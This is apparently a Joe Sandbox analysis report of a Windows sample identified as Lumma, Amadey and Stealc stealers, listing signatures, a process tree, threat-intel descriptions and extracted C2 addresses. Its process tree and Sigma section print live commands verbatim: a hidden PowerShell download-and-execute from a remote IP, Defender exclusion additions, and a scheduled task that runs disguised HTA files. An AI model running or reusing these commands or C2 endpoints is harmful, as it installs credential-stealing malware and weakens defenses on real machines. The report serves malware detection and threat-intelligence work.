Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5EfYBe3nch.exe

Overview

General Information

Sample name:5EfYBe3nch.exe
renamed because original name is a hash value
Original sample name:2ba2329d40af33806efdb0bbe5aeb0ad.exe
Analysis ID:1582701
MD5:2ba2329d40af33806efdb0bbe5aeb0ad
SHA1:31c237c3d02833010e8788c653e03c8637c4927f
SHA256:cdf06ee922f209a5ea0f3a2f05acc8813e0cc98384493a54373cc246e8ad1095
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and execute file
Yara detected Amadey
Yara detected Amadeys stealer DLL
Yara detected Babadeda
Yara detected LiteHTTP Bot
Yara detected LummaC Stealer
Yara detected Poverty Stealer
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
Yara detected obfuscated html page
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Creates HTA files
Drops PE files to the document folder of the user
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: PowerShell DownloadFile
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious MSHTA Child Process
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to download and execute files (via powershell)
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file overlay found
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 5EfYBe3nch.exe (PID: 7268 cmdline: "C:\Users\user\Desktop\5EfYBe3nch.exe" MD5: 2BA2329D40AF33806EFDB0BBE5AEB0AD)
    • DLTDCR8UJINP8YM8Y.exe (PID: 7656 cmdline: "C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe" MD5: 8AFA0085DF245EA0BE67A6A4BABA228D)
      • chrome.exe (PID: 2496 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 7512 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2596 --field-trial-handle=2532,i,194429869990168625,15952654104286526846,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • cmd.exe (PID: 8016 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\GIIIIJDHJE.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • GIIIIJDHJE.exe (PID: 7620 cmdline: "C:\Users\user\Documents\GIIIIJDHJE.exe" MD5: 375CE25C0529862F6EE716A3E001BB0E)
          • skotes.exe (PID: 5968 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 375CE25C0529862F6EE716A3E001BB0E)
    • 31FYMQUCQX14ZVCZU2HAYNV7V.exe (PID: 7896 cmdline: "C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe" MD5: 375CE25C0529862F6EE716A3E001BB0E)
      • skotes.exe (PID: 8060 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 375CE25C0529862F6EE716A3E001BB0E)
  • skotes.exe (PID: 8068 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 375CE25C0529862F6EE716A3E001BB0E)
  • skotes.exe (PID: 8160 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 375CE25C0529862F6EE716A3E001BB0E)
    • iSHmPkn.exe (PID: 7540 cmdline: "C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe" MD5: 27998D2440B5A856ECA1795EABB8FA23)
    • eXbhgU9.exe (PID: 7812 cmdline: "C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe" MD5: 9BE5AC720DCF1838FD5A2D7352672F66)
      • conhost.exe (PID: 5264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1888 cmdline: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\YQNZByFp' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3128 cmdline: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 4904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • jyidkjkfhjawd.exe (PID: 4296 cmdline: "C:\YQNZByFp\jyidkjkfhjawd.exe" MD5: 1B40450E11F71DA7D6F3D9C025C078E0)
    • cmd.exe (PID: 6528 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4476 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" any_word MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7500 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • powershell.exe (PID: 420 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 2892 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • powershell.exe (PID: 3352 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • mshta.exe (PID: 4828 cmdline: mshta "C:\Temp\.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
          • powershell.exe (PID: 1228 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 2308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • 483d2fa8a0d53818306efeb32d3.exe (PID: 6552 cmdline: "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe" MD5: 375CE25C0529862F6EE716A3E001BB0E)
        • schtasks.exe (PID: 3872 cmdline: schtasks /delete /tn "AutoRunHTA" /f MD5: 48C2FE20575769DE916F48EF0676A965)
        • schtasks.exe (PID: 3272 cmdline: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f MD5: 48C2FE20575769DE916F48EF0676A965)
  • cmd.exe (PID: 5164 cmdline: cmd.exe /c for %f in ("C:\Temp\*.gif") do (copy "%f" "C:\Temp\\random.hta" & start mshta "C:\Temp\\random.hta") MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • mshta.exe (PID: 5728 cmdline: mshta "C:\Temp\\random.hta" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • powershell.exe (PID: 1696 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • 483d2fa8a0d53818306efeb32d3.exe (PID: 7120 cmdline: "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe" MD5: 375CE25C0529862F6EE716A3E001BB0E)
  • cmd.exe (PID: 7160 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7960 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" any_word MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3808 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 8116 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7744 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 7756 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • mshta.exe (PID: 2688 cmdline: mshta "C:\Temp\.hta" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
        • powershell.exe (PID: 980 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 5768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 483d2fa8a0d53818306efeb32d3.exe (PID: 6288 cmdline: "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe" MD5: 375CE25C0529862F6EE716A3E001BB0E)
      • schtasks.exe (PID: 3132 cmdline: schtasks /delete /tn "AutoRunHTA" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 5968 cmdline: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • cmd.exe (PID: 7584 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1060 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" any_word MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6128 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 3352 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 5576 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 5696 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • mshta.exe (PID: 5168 cmdline: mshta "C:\Temp\.hta" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
        • powershell.exe (PID: 7768 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 483d2fa8a0d53818306efeb32d3.exe (PID: 7188 cmdline: "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe" MD5: 375CE25C0529862F6EE716A3E001BB0E)
      • schtasks.exe (PID: 5212 cmdline: schtasks /delete /tn "AutoRunHTA" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 7608 cmdline: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
BabadedaAccording to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "stok"}

Threatname: LummaC

{"C2 url": ["nearycrepso.shop", "rabidcowse.shop", "cloudewahsj.shop", "wholersorie.shop", "framekgirus.shop", "abruptyopsn.shop", "noisycuttej.shop", "tirepublicerj.shop", "fancywaxxers.shop"], "Build id": "W0uk--"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Temp\.gifJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security
    C:\Users\user\AppData\Local\Temp\1027024001\am.exeJoeSecurity_BabadedaYara detected BabadedaJoe Security
      C:\Temp\random.htaJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\10DCQZI[1].exeJoeSecurity_LiteHTTPBotYara detected LiteHTTP BotJoe Security
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\10DCQZI[1].exeMALWARE_Win_CoreBotDetects CoreBotditekSHen
          • 0x8a3e:$v1_1: newtask
          • 0x7374:$v1_6: payload
          • 0x7577:$v1_7: DownloadFile
          • 0x7584:$v1_8: RemoveFile
          • 0x89f0:$cnc1: &os=
          • 0x89fa:$cnc2: &pv=
          • 0x8a04:$cnc3: &ip=
          • 0x8a0e:$cnc4: &cn=
          • 0x8a18:$cnc5: &lr=
          • 0x8a22:$cnc6: &ct=
          • 0x8a2c:$cnc7: &bv=
          • 0x8a4e:$cnc8: &op=
          • 0x8a5c:$cnc9: &td=
          • 0x8a70:$cnc10: &uni=
          Click to see the 6 entries

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            0000002B.00000002.2673808874.00000000005F1000.00000040.00000001.01000000.0000001A.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              00000010.00000002.2504667961.00000000006E1000.00000040.00000001.01000000.00000010.sdmpJoeSecurity_PovertyStealerYara detected Poverty StealerJoe Security
                00000049.00000002.2882969985.00000000005F1000.00000040.00000001.01000000.0000001A.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  00000002.00000002.2278140862.0000000000F0E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 22 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    0.3.5EfYBe3nch.exe.14b4ba0.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      14.2.skotes.exe.fa0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                        13.2.GIIIIJDHJE.exe.780000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                          44.2.483d2fa8a0d53818306efeb32d3.exe.5f0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                            5.2.31FYMQUCQX14ZVCZU2HAYNV7V.exe.480000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                              Click to see the 8 entries

                              Other

                              SourceRuleDescriptionAuthorStrings
                              amsi32_1228.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                                amsi64_1696.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                                  amsi64_980.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                                    amsi64_7768.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                                      Sigma Signatures

                                      System Summary

                                      barindex
                                      Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                                      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f, CommandLine: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" any_word , ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4476, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f, ProcessId: 3272, ProcessName: schtasks.exe
                                      Sigma detected: Invoke-Obfuscation VAR+ Launcher
                                      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f, CommandLine: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" any_word , ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4476, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f, ProcessId: 3272, ProcessName: schtasks.exe
                                      Sigma detected: New RUN Key Pointing to Suspicious Folder
                                      Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1026818021\am.cmd, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 8160, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am.cmd
                                      Sigma detected: PowerShell DownloadFile
                                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 4828, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 1228, ProcessName: powershell.exe
